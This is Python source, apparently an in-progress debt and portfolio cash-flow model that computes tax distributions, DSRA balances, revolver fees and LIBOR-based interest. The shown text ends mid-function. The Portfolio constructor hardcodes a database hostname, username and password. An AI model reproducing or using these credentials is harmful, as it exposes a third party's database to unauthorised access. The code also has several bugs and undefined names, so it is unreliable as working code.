from scipy.optimize import fsolve
import openpyxl as opx
from collections import namedtuple
class Portfolio:
def __init__(self, **kwargs):
self.label = kwargs['label'] #where does this get used?
self.portfolio_scenario = kwargs['portfolio_scenario']
self.portfolio_version = kwargs['portfolio_version']
self.cap_struct_scenario = kwargs['cap_struct_scenario']
self.cap_struct_version = kwargs['cap_struct_version']
self.waterfall_scenario = kwargs['waterfall_scenario']
self.waterfall_version = kwargs['waterfall_version']
self.close_date = kwargs['close_date'].date()
self.terminal_date = kwargs['terminal_date'].date()
try:
self.yield_curve_date = kwargs['yield_curve_date']
except:
pass
try:
self.yield_curve_version = kwargs['yield_curve_version']
except:
pass
self.etr = kwargs['effective_tax_rate']
self.first_payment_date = kwargs['first_payment_date'].date()
self.periodicity_months_ptd = kwargs['periodicity_months_ptd']
self.ptd = {} #dictionary (date, amount)
#TODO what is better way to encapsulate database connection
HOST = 'kindledb.cfdmlfy5ocmf.us-west-2.rds.amazonaws.com'
USER = 'Andrew'
PASSWORD = 'Kindle01'
DATABASE = 'kean'
self.cnx = utils.generate_connection_instance(HOST, USER, PASSWORD, DATABASE)
return
def get_amount(self, item, period, cash=0, prepayments=0.0):
if item == 'ptd':
amount = self.calc_ptd(period, prepayments)
elif item == 'ptd cleanup':
amount = self.calc_ptd_cleanup(period, prepayments)
else:
print('ERROR in portfolio get_amount, unknown item - ', item)
sys.exit()
return amount
def set_amount(self, item, period, cash_flow):
if item == 'ptd':
self.ptd[period] = cash_flow
elif item == 'ptd cleanup':
#only necessar for optimization runs, zero when complete
pass
else:
print('ERROR in portfolio set_amount, unknown item - '. item)
sys.exit()
return
def is_payment_date(self, period):
if period < self.first_payment_date:
result = False
elif period > utils.calc_next_month_end(self.terminal_date, 'date', self.periodicity_months_ptd):
result = False
elif (period.year * 12 + period.month - self.first_payment_date.year * 12
- self.first_payment_date.month) % self.periodicity_months_ptd == 0:
result = True
else:
result = False
return result
def calc_number_ptd_payments_remaining(self, period):
if period.year == self.terminal_date.year:
number_ptd_payments = int((self.terminal_date.month - period.month) / self.periodicity_months_ptd) + 1
else:
number_ptd_payments = int((12 - period.month) / self.periodicity_months_ptd) + 1
return number_ptd_payments
def calc_ptd(self, period, prepayments, flag_cleanup=False):
# ) check if ptd payment date (usually quarterly)
#1) get OpCo CFO
#3) calc interest expense
# - actual & forecast
# - oid & dfc
#4) get tax depreciation
# - get capex
# - get tax register (or variation)
# - calc tax depreciation
#5) get effective tax rate
#6) determine how much gets paid this period
# - determine how many periods (acquisition different than existing)
# - determine how many periods already paid (subtract from annual calc)
# REUSE FUNCTION FOR CLEANUP CALC
# - NEED CLEANUP FLAG TO NOT INCLUDE CURRENT PERIOD PTD
number_payments = self.calc_number_ptd_payments_remaining(period)
ptd = 0.0
if self.is_payment_date(period):
month_number = (period.year * 12 + period.month) - (self.close_date.year * 12 + self.close_date.month)
if period.year == self.close_date.year:
months_in_tax_year = 12 - self.close_date.month + 1 #assumes close date is start of month
elif period.year == self.terminal_date.year:
months_in_tax_year = self.terminal_date.month #assumes terminal date is last day of month
else:
months_in_tax_year = 12
tax_ebitda = 0.0
tax_capex = 0.0
for ins in portfolio.instruments:
if self.instruments[ins].type == 'OperatingCompany':
ebitda = self.instruments[ins].ebitda #dictionary of cash flows
capex = self.instruments[ins].capex #dictionary of cash flows
for cashflow in ebitda:
if cashflow.year == period.year and cashflow >= self.close_date:
tax_ebitda += ebitda[cashflow]
for cashflow in capex:
if cashflow.year == period.year and cashflow >= self.close_date:
tax_capex += capex[cashflow]
tax_depreciation = -self.instruments[ins].tax_register.calc_depreciation(period)
if self.instruments[ins].type in ['Debt', 'FixedDebt', 'FloatingDebt', 'MezzanineDebt']:
cash_interest = self.instruments[ins].calc_tax_interest(period, prepayments, month_number, months_in_tax_year)
ptd_paid = 0.0
for cashflow in self.ptd:
if cashflow.year == period.year:
if flag_cleanup and cashflow == period:
pass
else:
ptd_paid += self.ptd[cashflow]
ptd_tax_year = -(tax_ebitda + cash_interest + tax_depreciation) * self.etr
ptd = (ptd_tax_year - ptd_paid) / number_payments
return ptd
def calc_ptd_cleanup(self, period, prepayments):
#change the solver prepayments to reflect the current period actual prepayment,
# then call calc_ptd
flag_cleanup = True
ptd_cleanup = 0.0
if self.is_payment_date:
month_number = (period.year * 12 + period.month) - (self.close_date.year * 12 + self.close_date.month)
for ins in portfolio.instruments:
if self.instruments[ins].type in ['Debt', 'FixedDebt', 'FloatingDebt']:
if self.instruments[ins].flag_prepayable:
prepayments[month_number] = self.instruments[ins].prepayments[period]
ptd = self.calc_ptd(period, prepayments, flag_cleanup)
ptd_cleanup = ptd - self.ptd[period]
#print('ptd cleanup calc = ', ptd, self.ptd[period], ptd_cleanup)
return ptd_cleanup
class OperatingCompany:
# TODO figure out how to laod CFO from database
def __init__(self, **kwargs):
self.type = kwargs['class']
self.label = kwargs['label']
self.working_capital = kwargs['working_capital'] / UNITS
self.working_capital_target = kwargs['working_capital_target'] / UNITS
self.interest_rate_wc = kwargs['interest_rate_wc']
self.periodicity_months = kwargs['periodicity_months']
self.day_count = kwargs['day_count']
self.scenario_date_start = kwargs['scenario_date_start'].date()
self.scenario_date_end = kwargs['scenario_date_end'].date()
try:
self.financials_scenario = kwargs['financials_scenario']
self.financials_version = kwargs['financials_version']
self.financials_company = kwargs['financials_company']
self.financials_entity = kwargs['financials_entity']
except:
pass
self.flag_tax_asset_detail = kwargs['flag_tax_asset_detail']
self.cfo = self.get_cfo() # dictionay (date/amount)
self.ebitda = self.get_ebitda() # dictionay (date/amount)
self.capex = self.get_capex() # dictionay (date/amount)
self.get_tax_register()
# for reporting
self.working_capital_history = {} # dictionary (date/amount)
self.cfo_history = {}
self.interest_income_history = {}
self.working_capital_change = {}
def get_cfo(self):
# TODO: allow for specific companry and entity in query
# use dict initially, consider dataframe on refactor
if hasattr(self, 'financials_scenario'):
# get CFO from database
query = ("SELECT period, sum(value) as value FROM financials WHERE scenario = %s AND version = %s AND "
"account = 'EBITDA less Capex' GROUP BY period")
df_cfo = pd.read_sql(query, cnx, params=(self.financials_scenario, self.financials_version), index_col=['period'])
df_cfo['value'] = df_cfo['value'] / UNITS
cfo = df_cfo.to_dict()['value']
return cfo
def get_ebitda(self):
#TODO: allow for specific companry and entity in query
#use dict initially, consider dataframe on refactor
if hasattr(self, 'financials_scenario'):
#get CFO from database
query = ("SELECT period, sum(value) as value FROM financials WHERE scenario = %s AND version = %s AND "
"account = 'EBITDA' GROUP BY period")
df_ebitda = pd.read_sql(query, cnx, params=(self.financials_scenario, self.financials_version), index_col=['period'])
df_ebitda['value'] = df_ebitda['value'] / UNITS
ebitda = df_ebitda.to_dict()['value']
else:
print('ERROR - no financials selected for OpCo get_ebitda')
sys.exit()
return ebitda
def get_capex(self):
#TODO: allow for specific companry and entity in query
#use dict initially, consider dataframe on refactor
if hasattr(self, 'financials_scenario'):
#get CFO from database
query = ("SELECT period, sum(value) as value FROM financials WHERE scenario = %s AND version = %s AND "
"account in ('Maintenance Capex', 'Environmental Capex', 'LTSA Capex', 'Growth Capex') GROUP BY period")
df_capex = pd.read_sql(query, cnx, params=(self.financials_scenario, self.financials_version), index_col=['period'])
df_capex['value'] = df_capex['value'] / UNITS
capex = df_capex.to_dict()['value']
else:
print('ERROR - no financials selected for OpCo get_ebitda')
sys.exit()
return capex
def get_tax_register(self):
if self.flag_tax_asset_detail:
self.tax_register = TaxRegister(self.label)
tax_assets = get_tax_register_from_xlsx()
for asset in tax_assets:
self.tax_register.add_asset(FixedAsset(*asset))
return
def get_amount(self, metric, period, cash=0, prepay=0.0):
if metric == 'CFO':
try:
#period_end = min(period, self.scenario_date_end)
#day_count_factor = utils.calc_day_count_factor(self.day_count, self.calc_prior_payment_period(period), period_end)
amount = self.cfo[period]
except Exception as e:
print("ERROR - invalid date for CFO ", period)
elif metric == 'working capital':
amount = max(self.working_capital, 0)
elif metric == 'interest income':
amount = self.calc_interest_income(period)
elif metric == 'sweep':
#should be last item in waterfall; happens on non-quarter end months; cash sits in bank account
#self.working_capital += cash
amount = -cash
elif metric == 'working capital reset':
amount = max(-self.working_capital_target, -cash)
else:
print("Error in OperatingCompany get_amount - unknown metric ", metric)
sys.exit()
return amount
def set_amount(self, item, period, cash_flow):
if item == 'CFO':
self.cfo_history[period] = cash_flow
elif item == 'interest income':
self.interest_income_history[period] = cash_flow
elif item == 'working capital':
self.working_capital_history[period] = self.working_capital
self.working_capital_change[period] = cash_flow
self.working_capital -= cash_flow
#self.working_capital_history.append((period, self.working_capital))
elif item == 'working capital reset':
self.working_capital -= cash_flow
elif item == 'sweep':
self.working_capital -= cash_flow
else:
print('Error - unknown item in OperatingCompany set_amount ', item)
return
def calc_prior_payment_period(self, period):
if period <= self.scenario_date_start:
prior_period = None
elif period > self.scenario_date_end:
#check if stub final period
if utils.calc_next_month_end(self.scenario_date_end, 'date', self.periodicity_months) < period :
prior_period = None
else:
prior_period = utils.calc_next_month_end(period, 'date', -self.periodicity_months)
elif period < utils.calc_next_month_end(self.scenario_date_start, 'date', +self.periodicity_months):
prior_period = self.scenario_date_start
else:
prior_period = utils.calc_next_month_end(period, 'date', -self.periodicity_months)
return prior_period
def calc_interest_income(self, period):
#calculates interest income on working capital
period_end = min(period, self.scenario_date_end)
day_count_factor = utils.calc_day_count_factor(self.day_count, self.calc_prior_payment_period(period), period_end)
interest = self.working_capital * self.interest_rate_wc * day_count_factor
return interest
class Revolver:
def __init__(self, **kwargs):
self.type = kwargs['class']
self.label = kwargs['label']
self.issue_date = kwargs['issue_date']
self.term = kwargs['term']
self.maturity_date = self.issue_date + relativedelta(months=+self.term) + relativedelta(days=-1)
self.maturity_date = self.maturity_date.date()
self.credit_line = kwargs['credit_line'] / UNITS
self.initial_balance = kwargs['initial_balance'] / UNITS
self.index_name = kwargs['index_name']
self.margin = kwargs['margin']
self.day_count = kwargs['day_count']
self.periodicity_months = kwargs['periodicity_months']
self.undrawn_line_fee = kwargs['undrawn_line_fee']
try:
self.dsra = kwargs['dsra'] / UNITS
except:
pass
self.dsra_months = kwargs['dsra_months']
self.first_payment_date = kwargs['first_payment_date'].date()
try:
self.letters_of_credit = kwargs['letters_of_credit'] / UNITS
except:
self.letters_of_credit = 0.0
try:
self.lc_fee_rate = kwargs['lc_fee_rate']
except:
self.lc_fee_rate = 0.0
self.principal = self.initial_balance
self.set_index()
self.line_fees = {}
self.lc_fees = {}
self.interest_expense ={}
self.dsra_change = {}
self.dsra_release = {}
self.draws = {}
self.sweeps = {}
def set_index(self):
#pull libor curve from KEAN
self.index = self.get_adj_libor()
return
def get_libor(self):
#purpose: return df of monthly libor rates, these have various forward dates
#assume LIBOR-1MO initially
#TO DO: allow different scenarios and versions
query = ("SELECT period, price FROM prices WHERE scenario = 'Actuals' AND version = %s "
"AND instrument_id = %s AND valuation_date = %s ORDER BY period")
df = pd.read_sql(query, cnx, params=(YIELD_CURVE_VERSION, self.index_name, YIELD_CURVE_DATE))
return df
def get_adj_libor(self):
#purpose: convert df from get_libor to curve based on month end dates
#call get_libor, interpolate/extropolate to month_end data points
#TODO: overload start and end date to allow extrapolation of rates
df = self.get_libor()
period = utils.calc_month_end(df['period'].min(), 'date')
curve = {}
while period < df.iloc[0]['period']:
#extropolate backwards - should never happen
increment = (df.iloc[1]['price'] - df.iloc[0]['price']) / (df.iloc[1]['period'] - df.iloc[0]['period']).days
interval = (df.iloc[0]['period'] - period).days
curve[period] = df.iloc[0]['price'] - interval * increment
period = utils.calc_next_month_end(period, 'date')
while period <= df['period'].max():
#interpolate
bottom_date = max(df.loc[(df['period']<=period)]['period'])
bottom_yield = df.loc[df['period']==bottom_date]['price'].values[0]
if period == bottom_date:
curve[period] = bottom_yield
elif df.loc[df['period']>period].shape[0] == 0:
#need to extropolate - does not happen unless overload start and end dates
increment = (df.iloc[-1]['price'] - df.iloc[-2]['price']) / ((df.iloc[-1]['period'] - df.iloc[-2]['period']).days)
interval = (period - df.iloc[-1]['period']).days
curve[period] = df.iloc[-1]['price'] + interval * increment
else:
top_date = min(df.loc[(df['period']>=period)]['period'])
bottom_yield = df.loc[df['period']==bottom_date]['price'].values[0]
top_yield = df.loc[df['period']==top_date]['price'].values[0]
increment = (top_yield - bottom_yield) / (top_date - bottom_date).days
interval = (period - bottom_date).days
curve[period] = bottom_yield + interval * increment
period = utils.calc_next_month_end(period, 'date')
#df_curve = pd.DataFrame(curve, columns= ['period', 'libor'])
return curve
def get_amount(self, item, period, cash=0, prepay=0.0):
if item == 'undrawn line fee':
if self.is_payment_date(period):
try:
amount = self.calc_undrawn_line_fee(period)
except:
print("ERROR - invalid date for Revolver ", period)
sys.exit()
else:
amount = 0.0
elif item == 'lc fees':
if self.is_payment_date(period):
amount = self.calc_lc_fees(period)
else:
amount = 0.0
elif item == 'draw':
amount = self.credit_line - self.principal - self.letters_of_credit
elif item == 'interest expense':
if self.is_payment_date(period):
amount = -self.calc_interest_expense(period)
else:
amount = 0.0
elif item == 'dsra reset':
#amount = self.calc_dsra_change(period)
amount = 0.0
elif item == 'dsra release':
#placeholder
amount = 0.0
elif item == 'sweep':
amount = -(self.principal)
else:
print("Error in Revolver get_amount - unknown metric ", metric)
sys.exit()
return amount
def set_amount(self, item, period, cash_flow):
if item == 'undrawn line fee':
self.line_fees[period] = cash_flow
elif item == 'lc fees':
self.lc_fees[period] = cash_flow
elif item == 'interest expense':
self.interest_expense[period] = cash_flow
elif item == 'dsra change':
self.dsra_change[period] = cash_flow
elif item == 'dsra release':
self.dsra_release[period] = cash_flow
elif item == 'draw':
self.draws[period] = cash_flow
self.principal += cash_flow
elif item == 'sweep':
self.sweeps[period] = cash_flow
self.principal += cash_flow
else:
print('Error - unknown item in Revolver set_amount ', item)
return
def is_payment_date(self,period):
if period < self.first_payment_date:
result = False
elif period > utils.calc_next_month_end(self.maturity_date, 'date', self.periodicity_months):
result = False
elif (period.year * 12 + period.month - self.first_payment_date.year * 12
- self.first_payment_date.month) % self.periodicity_months == 0:
result = True
else:
result = False
return result
def calc_prior_payment_period(self, period):
#only gets called if valid payment date
#need to check if first payment date
if period == self.first_payment_date:
prior_period = self.issue_date
else:
prior_period = utils.calc_next_month_end(period, 'date', -self.periodicity_months)
return prior_period
def calc_interest_rate(self, period):
try:
self.interest_rate = self.index[period] + self.margin
except:
print("Error in calc_interest_rate - invalid period ", period)
return
def calc_interest_expense(self, period):
#calculates interest income on working capital
day_count_factor = utils.calc_day_count_factor(self.day_count, self.calc_prior_payment_period(period), period)
self.calc_interest_rate(period)
interest = self.calc_principal_bop(period) * self.interest_rate * day_count_factor
return interest
def calc_dsra(self, period):
#initially assume no paydown of debt (removes circularity of calc)
#TODO include paydown of debt
#1) LC fees
lc_fees = 0.0 * self.dsra_months / 12
#2) undrawn line fee
undrawn_line_fee = (self.credit_line - self.principal) * self.undrawn_line_fee * self.dsra_months / 12
#3) interest expense
interest_expense = 0.0
if self.dsra_months < self.periodicity_months:
#this is necessary for annual models with 6 month dsra requirements
#need to determine what correct period to call calc_interest
#next_period = utils.calc_next_month_end(period, 'date', self.periodicity_months)
#interest = self.calc_interest_expense(next_period, self.principal - prepayment)
#interest_portion = self.dsra_months / self.periodicity_months * interest
pass
else:
if period < self.first_payment_date:
#determine initial stub period
# after first payment, should only check dsra on payment date
# initially assume stub payment index = first payment index
#TODO: calc proper stub index rate
day_count_factor = utils.calc_day_count_factor(self.day_count, PORTFOLIO_START_DATE, self.first_payment_date)
interest_expense += self.initial_balance * (self.index[period] + self.margin) * day_count_factor
#determine how many whole payment periods follow
# assumes month of close counts as 1 month
dsra_end = utils.calc_next_month_end(PORTFOLIO_START_DATE, 'date', self.dsra_months - 1)
pmt_periods = int((dsra_end.year * 12 + dsra_end.month - PORTFOLIO_START_DATE.year * 12 -
PORTFOLIO_START_DATE.month)/self.periodicity_months)
current_period = self.first_payment_date
next_period = utils.calc_next_month_end(self.first_payment_date, 'date', self.periodicity_months)
for i in range(pmt_periods):
day_count_factor = utils.calc_day_count_factor(self.day_count, current_period, next_period)
#assume no paydown in balance
interest_expense += self.initial_balance * (self.index[current_period] + self.margin) * day_count_factor
current_period = next_period
next_period = utils.calc_next_month_end(next_period, 'date', self.periodicity_months)
#check if stub end period
stub_months = ((dsra_end.year * 12 + dsra_end.month - PORTFOLIO_START_DATE.year * 12 -
PORTFOLIO_START_DATE.month) % self.periodicity_months)
if stub_months != 0:
day_count_factor = utils.calc_day_count_factor(self.day_count, current_period, next_period)
#assume no paydown in balance
interest_expense += self.initial_balance * (self.index[current_period] + self.margin) * day_count_factor
else:
#normal dsra calc on a payment period
while period < utils.calc_next_month_end(period, 'date', self.dsra_months):
next_period = utils.calc_next_month_end(period, 'date', self.periodicity_months)
day_count_factor = utils.calc_day_count_factor(self.day_count, period, next_period)
interest_expense += self.principal * (self.index[period] + self.margin) * day_count_factor
period = next_period
return lc_fees + undrawn_line_fee + interest_expense
def calc_dsra_change(self,period):
#figure out day count factor implications at later time
interest = 0.0
undrawn_line_fee = (self.credit_line - self.principal) * self.undrawn_line_fee
lc_fees = 0.0
dsra_new = (interest + lc_fees + undrawn_line_fee) * self.dsra_months / 12
return self.dsra - dsra_new
def calc_undrawn_line_fee(self, period):
if self.is_payment_date(period):
period_end = min(period, self.maturity_date)
day_count_factor = utils.calc_day_count_factor(self.day_count, self.calc_prior_payment_period(period), period_end)
amount = -(self.credit_line - self.principal - self.letters_of_credit + self.draws[period]) * self.undrawn_line_fee * day_count_factor
else:
amount = 0.0
return amount
def calc_lc_fees(self, period):
period_end = min(period, self.maturity_date)
day_count_factor = utils.calc_day_count_factor(self.day_count, self.calc_prior_payment_period(period), period_end)
amount = -self.letters_of_credit * self.lc_fee_rate * day_count_factor
return amount
def calc_principal_bop(self, period):
#necessary for interest expense calc
draws = 0.0
sweeps = 0.0
period_loop = utils.calc_month_end(self.issue_date, 'date')
while period_loop < period:
try:
draws += self.amortization[period_loop]
except:
draws += 0.0
try:
sweeps += self.prepayments[period_loop]
except:
sweeps += 0.0
period_loop = utils.calc_next_month_end(period_loop, 'date')
principal = self.initial_balance + draws + sweeps
return principal
class Debt:
def __init__(self, **kwargs):
#self.name = name
self.type = kwargs['class']
self.label = kwargs['label']
self.issue_date = kwargs['issue_date'].date()
self.initial_balance = kwargs['initial_balance'] / UNITS
self.annual_amort_percent = kwargs['annual_amort_percent']
self.interest_date_start = kwargs['interest_date_start'].date()
self.amort_date_start = kwargs['amort_date_start'].date()
self.periodicity_months = kwargs['periodicity_months']
#self.set_periodicity_months()
self.amort_const = (self.initial_balance * self.annual_amort_percent / (12 / self.periodicity_months))
self.day_count = kwargs['day_count']
self.sweep_percent = kwargs['sweep_percent']
self.term = kwargs['term']
self.maturity_date = self.issue_date + relativedelta(months=+self.term) + relativedelta(days=-1)
self.oid = kwargs['oid']
self.dfc = kwargs['dfc']
self.flag_prepay_offset = kwargs['flag_prepay_offset']
self.dsra_months = kwargs['dsra_months']
self.dsra = self.initialize_dsra()
self.dsra_interest_rate = kwargs['dsra_interest_rate']
self.flag_prepayable = kwargs['flag_prepayable']
try:
self.flag_swaps = kwargs['flag_swaps']
self.company = kwargs['company']
except:
self.flag_swaps = False
#self.lc_fees = kwargs['lc_fees']
self.principal = self.initial_balance
self.amortization = {}
self.prepayments = {}
self.interest_expense = {}
self.principal_history_bop = {}
self.principal_history_eop = {}
self.dsra_change = 0.0
self.prepayment = 0.0
self.cfas_flag = False
def set_periodicity_months(self):
if self.periodicity == 'monthly':
self.periodicity_months = 1
elif self.periodicity == 'quarterly':
self.periodicity_months =3
elif self.periodicity == 'semiannual':
self.periodicity_months = 6
elif self.periodicity == 'annual':
self.periodicity_months = 12
else:
print('ERROR: unknown periodicity in DebtInstrument ini - ', self.periodicity)
return
def set_amount(self, item, period, cash_flow):
if item == 'interest income':
#not clear if anything needs to happen
pass
elif item == 'dsra release':
self.dsra -= cash_flow
elif item == 'interest expense':
self.interest_expense[period] = cash_flow
elif item == 'amortization':
self.principal_history_bop[period] = self.principal
self.amortization[period] = cash_flow
self.principal += cash_flow
elif item == 'dsra reset':
self.dsra -= cash_flow
elif item == 'sweep':
if self.flag_prepayable:
self.prepayments[period] = cash_flow
self.principal += cash_flow
self.principal_history_eop[period] = self.principal
elif item == 'dsra cleanup':
#self.dsra -= cash_flow
pass
else:
print("Error - unknow item sent to set_amount ", item)
return
def initialize_dsra(self):
#test if initial dsra balance is loaded with debt profile
try:
self.dsra = kwargs['dsra_months']
except:
pass
#if initial dsra balance is not loaded with debt profile, calculate
if not hasattr(self, 'dsra'):
months_to_first_payment = (self.interest_date_start.year * 12 + self.interest_date_start.month -
utils.calc_next_month_end(self.issue_date, 'date', -1).year * 12 -
utils.calc_next_month_end(self.issue_date, 'date', -1).month)
#initialize values
dsra_princ = self.dsra_months / 12 * self.annual_amort_percent * self.initial_balance
dsra_int = 0.0
principal = self.initial_balance
prior_period = self.issue_date
if months_to_first_payment % self.periodicity_months == 0:
#no stub period
period = utils.calc_next_month_end(utils.calc_next_month_end(self.issue_date, 'date', -1), 'date', self.periodicity_months)
#print(principal, prior_period, period, self.dsra_months / self.periodicity_months)
#sys.exit()
for i in range(int(self.dsra_months / self.periodicity_months)):
interest_rate = self.calc_interest_rate(period)
day_count_factor = utils.calc_day_count_factor(self.day_count, prior_period, period)
#print(i, interest_rate, day_count_factor, principal)
dsra_int += principal * day_count_factor * interest_rate
if period >= self.amort_date_start:
principal -= self.amort_const
prior_period = period
period = utils.calc_next_month_end(period, 'date', self.periodicity_months)
else:
#has stub periods
#calc interest for initial stub (add one since issue dates are assumed to be first of month)
stub_months = (self.interest_date_start.year * 12 + self.interest_date_start.month -
self.issue_date.year * 12 - self.issue_date.month + 1) % self.periodicity_months
period = utils.calc_next_month_end(utils.calc_next_month_end(self.issue_date, 'date', -1), 'date', stub_months)
interest_rate = self.calc_interest_rate(period)
day_count_factor = utils.calc_day_count_factor(self.day_count, prior_period, period)
dsra_int += principal * day_count_factor * interest_rate
#calc interest expense for middle, normal periods
if period >= self.amort_date_start:
principal -= self.amort_const
prior_period = period
period = utils.calc_next_month_end(period, 'date', self.periodicity_months)
for i in range(int((self.dsra_months-stub_months)/self.periodicity_months)):
interest_rate = self.calc_interest_rate(period)
day_count_factor = utils.calc_day_count_factor(self.day_count, prior_period, period)
dsra_int += principal * day_count_factor * interest_rate
#calc interest expense for final stub period
if period >= self.amort_date_start:
principal -= self.amort_const
prior_period = period
period = utils.calc_next_month_end(utils.calc_next_month_end(self.issue_date, 'date', -1), 'date', self.dsra_months)
#need to get interest rate assuming normal period end
interest_rate = self.calc_interest_rate(utils.calc_next_month_end(prior_period, 'date', self.periodicity_months))
day_count_factor = utils.calc_day_count_factor(self.day_count, prior_period, period)
dsra_int += principal * day_count_factor * interest_rate
dsra = self.amort_const * 2 + dsra_int
return dsra
def is_interest_payment_date(self,period):
if period < self.interest_date_start:
result = False
elif period > utils.calc_next_month_end(self.maturity_date, 'date', self.periodicity_months):
result = False
elif (period.year * 12 + period.month - self.interest_date_start.year * 12
- self.interest_date_start.month) % self.periodicity_months == 0:
result = True
else:
result = False
return result
def calc_amort(self, period):
if self.is_interest_payment_date(period):
amount = self.annual_amort_percent * self.initial_balance * self.periodicity_months / 12
else:
amount = 0.0
return amount
def calc_date_prior_interest_payment(self, period):
#necessary to calculate number of days in current interest period
#only gets called if (date_diff.months + date_diff.years * 12) % 3 == 0
# so one less * periodicity_months should equal months to prior payment
# need to test for first payment
date_diff = relativedelta(period, self.payment_date_start)
payment_number = (date_diff.months + date_diff.years * 12) % self.periodicity_months
prior_payment_period = utils.calc_month_end(period + relativedelta(months=-self.periodicity_months), 'date')
if prior_payment_period < self.issue_date:
prior_payment_period = self.issue_date
return prior_payment_period
def calc_interest_rate(self, period):
return self.interest_rate
def calc_interest_expense(self, period, principal=None):
if principal == None:
principal = self.principal
if self.is_interest_payment_date(period):
prior_period = self.calc_prior_payment_period(period)
day_count_factor = utils.calc_day_count_factor(self.day_count, prior_period, period)
int_exp = principal * self.calc_interest_rate(period) * day_count_factor
else:
int_exp = 0.0
if self.flag_swaps:
swap_payment = ins.calc_swaps_payment(self.company, period, YIELD_CURVE_DATE) / UNITS
else:
swap_payment = 0.0
return int_exp + swap_payment
def calc_period_days(self, period):
#return number of days in period for interest calc
prior_payment_period = self.calc_date_prior_interest_payment(period)
return (period - prior_payment_period).days
def calc_next_period(self, period):
#assumes period passed is a current payment period
next_period = utils.calc_next_month_end(period, 'date', self.periodicity_months)
return next_period
def calc_prior_payment_period(self, period):
#this function assumes it is called from valid payment date
if period <= self.issue_date:
prior_period = None
elif period > utils.calc_next_month_end(self.maturity_date, 'date', self.periodicity_months):
prior_period = None
elif period <= self.interest_date_start:
prior_period = self.issue_date
else:
prior_period = utils.calc_next_month_end(period, 'date', -self.periodicity_months)
return prior_period
def calc_dsra_int_inc(self, period):
day_count_factor = utils.calc_day_count_factor(self.day_count, self.calc_prior_payment_period(period), period)
return self.dsra * self.dsra_interest_rate * day_count_factor
def calc_cfas(self, cfas, *args):
#this functions solves for cfas and dsra_change simultaneously
# sets the dsra_change attribute to record results
#TODO add PTD
period, cash = args
prepay = self.sweep_percent * cfas[0]
principal_eop = self.principal - prepay
self.dsra_change = self.calc_dsra(period, principal_eop) - self.dsra
excess_cash = cash + self.dsra_change - cfas
return excess_cash
def calc_interest_income(self, period):
#calc interest income on dsra balances
if self.dsra == None or self.dsra == 0:
interest = 0.0
elif period >= utils.calc_next_month_end(self.maturity_date, 'date', self.periodicity_months):
interest = 0.0
else:
period_end = min(period, self.maturity_date)
prior_period = self.calc_prior_payment_period(period)
day_count_factor = utils.calc_day_count_factor(self.day_count, prior_period, period_end)
interest = self.dsra * self.dsra_interest_rate * day_count_factor
return interest
def calc_dsra_change(self, period, cash):
#assumes 6 month dsra requirement
#TODO refactor to allow different dsra terms
cfas = cash
cfas = fsolve(self.calc_cfas, cfas, (period, cash))[0]
return self.dsra_change
def calc_dsra(self, period, principal=None):
#Returns a positive amount for the required balance of the DSRA
#NOTE: interest rate is the rate applicable for payment made at period date
# if quarterly LIBOR, rate will be 90-day LIBOR ENDING on period date
#calc principal portion
if principal == None:
principal = self.principal
principal_portion = self.dsra_months / self.periodicity_months * self.amort_const
#calc interest portion
months_from_prior_payment = (period.year * 12 + period.month - self.interest_date_start.year * 12
- self.interest_date_start.month) % self.periodicity_months
next_period = utils.calc_next_month_end(period, 'date', (self.periodicity_months - months_from_prior_payment))
next_period_2 = utils.calc_next_month_end(next_period, 'date', self.periodicity_months)
interest_portion_1 = (principal * self.calc_interest_rate(next_period) *
utils.calc_day_count_factor(self.day_count, period, next_period))
interest_portion_2 = ((principal - self.amort_const) * self.calc_interest_rate(next_period_2) *
utils.calc_day_count_factor(self.day_count, next_period, next_period_2))
dsra = principal_portion + interest_portion_1 + interest_portion_2
#if self.label == 'Test TLC' and period in [date(2019,12,31), date(2020,3,31), date(2020,6,30)]:
# print('DSRA calc = ', next_period, next_period_2, interest_portion_1, interest_portion_2, principal_portion)
# print('DSRA interest calc = ', principal, self.calc_interest_rate(next_period), self.calc_interest_rate(next_period_2), utils.calc_day_count_factor(self.day_count, period, next_period))
# print(dsra)
# #sys.exit()
return dsra
def calc_principal_bop(self, period):
amort = 0.0
prepay = 0.0
period_loop = utils.calc_month_end(self.issue_date, 'date')
while period_loop < period:
#need try loop as TLC does not have amortization thus no step in the waterfall
try:
amort += self.amortization[period_loop]
except:
amort += 0.0
try:
prepay += self.prepayments[period_loop]
except:
prepay += 0.0
period_loop = utils.calc_next_month_end(period_loop, 'date')
principal = self.initial_balance + amort + prepay
return principal
def calc_tax_interest(self, period, prepayments, month_number, months_in_tax_year):
actual = sum(self.interest_expense.values())
forecast = 0.0
tax_month = utils.calc_next_month_end(period, 'date')
principal_bop = self.calc_principal_bop(period) - self.calc_amort(period)
while tax_month <= date(period.year, 12, 31):
forecast -= self.calc_interest_expense(tax_month, principal_bop + prepayments[month_number])
principal_bop -= self.calc_amort(tax_month)
tax_month = utils.calc_next_month_end(tax_month, 'date')
oid = -((100 - self.oid)/100 * self.initial_balance) / self.term * months_in_tax_year
dfc = -self.dfc * self.initial_balance / self.term * months_in_tax_year
interest_expense = actual + forecast + oid + dfc
return interest_expense
class FixedDebt(Debt):
#TODO move self.interest rate to Debt class
# need to determine if need FixedDebt class
def __init__(self, **kwargs):
self.interest_rate = kwargs['interest_rate']
Debt.__init__(self, **kwargs)
#TODO add local function to correctly calc initial dsra requirement
#self.dsra = self.calc_dsra(self.issuance_date)
def get_amount(self, item, period, cash=0, prepay=0.0):
if item == 'amortization':
amount = -self.calc_amort(period)
elif item == 'interest expense':
amount = -self.calc_interest_expense(period)
elif item == 'sweep':
cfas = 0
sweep = fsolve(self.calc_cfas, cfas, (period, cash))[0]
amount = -sweep
elif item == 'dsra change':
dsra_change = self.calc_dsra_change(period)
amount = dsra_change
elif item == 'interest income':
amount = self.calc_interest_income(period)
elif item == 'dsra release':
#placeholder - replace with test to see if dsra needed to make interest
# and amoritzation payments
amount = 0.0
else:
print("Error in FixedDebt get_amount - unknown metric ", metric)
sys.exit()
return amount
class FloatingDebt(Debt):
def __init__(self, **kwargs):
self.margin = kwargs['margin']
self.index_name = kwargs['index_name']
self.set_index()
Debt.__init__(self, **kwargs)
def set_index(self):
#pull libor curve from KEAN
self.index = self.get_adj_libor()
return
def get_libor(self):
#purpose: return df of monthly libor rates, these have various forward dates
#assume LIBOR-1MO initially
#TO DO: allow different scenarios and versions
query = ("SELECT period, price FROM prices WHERE scenario = 'Actuals' AND version = %s "
"AND instrument_id = %s AND valuation_date = %s ORDER BY period")
